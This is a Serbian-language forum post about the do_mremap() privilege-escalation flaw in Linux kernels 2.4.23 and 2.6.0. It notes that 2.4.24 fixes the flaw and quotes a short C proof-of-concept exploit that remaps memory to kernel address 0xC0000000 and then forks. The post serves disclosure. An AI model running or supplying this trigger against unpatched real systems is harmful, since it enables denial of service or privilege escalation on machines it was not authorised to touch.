do_mremap() vulnerability in Linux kernel

do_mremap() vulnerability in Linux kernel

offline
  • AxeZ 
  • Legendarni građanin
  • Pridružio: 17 Apr 2003
  • Poruke: 3989
  • Gde živiš: Novi Sad, Vojvodina

Ovo moze dovesti do povecanja privilegija u 2.4.23 i 2.6.0 kernelima

Odmah je izasla 2.4.24 verzija kernela koja ispravlja ovaj problem.

Vise informacija ovde:
http://www.linuxsecurity.org/articles/host_security_article-8684.html

A evo ga i proof of concept exploit...Wink



/*
* Proof-of-concept exploit code for do_mremap()
*
* Copyright (C) 2004 Christophe Devine and Julien Tinnes
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
Ko je trenutno na forumu
 

Ukupno su 813 korisnika na forumu :: 50 registrovanih, 10 sakrivenih i 753 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3028 - dana 22 Nov 2019 07:47

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: A.R.Chafee.Jr., Aleksa-, aljosa7, amaterSRB, bbelic, benne, beowl, bufanje, BW, cifra, Denaya, Dimitrise93, djboj, draganca, Dragoslav Racic, Drugsparrow, gasha, kovinacc, kvarc, Levi, Marko Marković2, MB120mm, mercedesamg, MiG-29M2, MiroslavD, MrNo, nadjas_515, Paja Pajser, pein, peruni, pirke2, pokojnitoza, powSrb, radoznao2, raketaš, rikirubio, rovac, ruseskij, S2M, sakota79, Singidunumac, Skijavoneska, Skywhaler, TegljacMete, Toper, trajkoni018, Trpe Grozni, vathra, vlvl, VP3987